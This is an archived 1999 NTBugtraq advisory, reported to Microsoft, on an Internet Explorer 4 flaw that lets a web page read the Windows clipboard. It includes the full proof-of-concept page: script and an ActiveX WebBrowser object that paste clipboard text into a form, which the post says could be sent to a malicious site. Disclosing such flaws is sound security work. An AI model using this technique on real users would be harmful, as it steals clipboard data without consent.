home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack99 / ie4_clipboard.txt < prev    next >
Encoding:
Internet Message Format  |  1999-03-26  |  2.4 KB

  1. Date: Mon, 22 Feb 1999 23:39:07 +0100
  2. From: Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES>
  3. To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  4. Subject: New IE4 vulnerability : the clipboard again.
  5.  
  6. Greetings, 
  7.  
  8. I have discovered another IE 4 clipboard vulnerability. The clipboard 
  9. content can be made public by a very simple javascript code.
  10.  
  11. I reported the problem to Microsoft on Feb 10. They confirmed the 
  12. problem. It seems that they were already aware of the problem and It 
  13. will be fixed in the next IE 4 service pack.
  14.  
  15. The problem is located in the Internet WebBrowser ActiveX object.
  16.  
  17. Regards,
  18. Juan Carlos
  19.  
  20. More info and a demo is available at :
  21. http://pages.whowhere.com/computers/cuartangojc
  22.  
  23. Regards,
  24.  
  25. Juan Carlos
  26.  
  27.  
  28. The Clipboard vulnerability demo
  29. http://pages.whowhere.lycos.com/computers/cuartangojc/cb.html
  30.  
  31. ----------
  32. <body onload="wb.navigate('http://pages.whowhere.com/computers/cuartangojc/blank.html')">
  33. <script>
  34.  
  35. function pt()
  36. {
  37.  
  38. if (document.forms(0).S1.value == "" )
  39.         {
  40.         wb.focus();
  41.         wb.Document.execCommand("paste");       
  42.         document.forms(0).S1.value = wb.Document.body.innerText;
  43.         }
  44. }
  45. function StartJob()
  46. {
  47. document.forms(0).S1.value = "";
  48. wb.focus();
  49. wb.Document.execCommand("paste");       
  50. window.setTimeout("pt()",1000);
  51. }
  52. </script>
  53.  
  54. According with Microsoft security rules access to Windows clipboard content 
  55. is forbidden to Internet Explorer scripts unless the clipboard content was 
  56. owned by the Explorer itself. If an script performs a paste operation over 
  57. an input text box the operation will succeed only if data were copied to 
  58. the clipboard from the Internet Explorer. 
  59.  
  60. There is a way to circumvent this protection by using a Microsoft Web Browser 
  61. ActiveX control this object can perform a paste operation without security 
  62. restrictions. The clipboard data can then be transferred to a form input box 
  63. and posted to a malicious WEB.
  64.  
  65. The box below is a Input Text Area Box your clipboard text data must be here, 
  66. if not then do a copy (from any application) and then reload this page.
  67.  
  68. <form method="POST" action="--WEBBOT-SELF--">
  69.   <!--webbot bot="SaveResults" startspan U-File="_private/form_results.txt"
  70.   S-Format="TEXT/CSV" S-Label-Fields="TRUE" --><!--webbot bot="SaveResults" endspan --><p><textarea
  71.  
  72.   rows="3" name="S1" cols="82"></textarea></p>
  73. </form>
  74.  
  75. The box below is a Microsoft Web Browser ActiveX control.
  76.  
  77. <object classid="clsid:8856F961-340A-11D0-A96B-00C04FD705A2" width="530" height="150"
  78. id="wb">
  79. </object>
  80.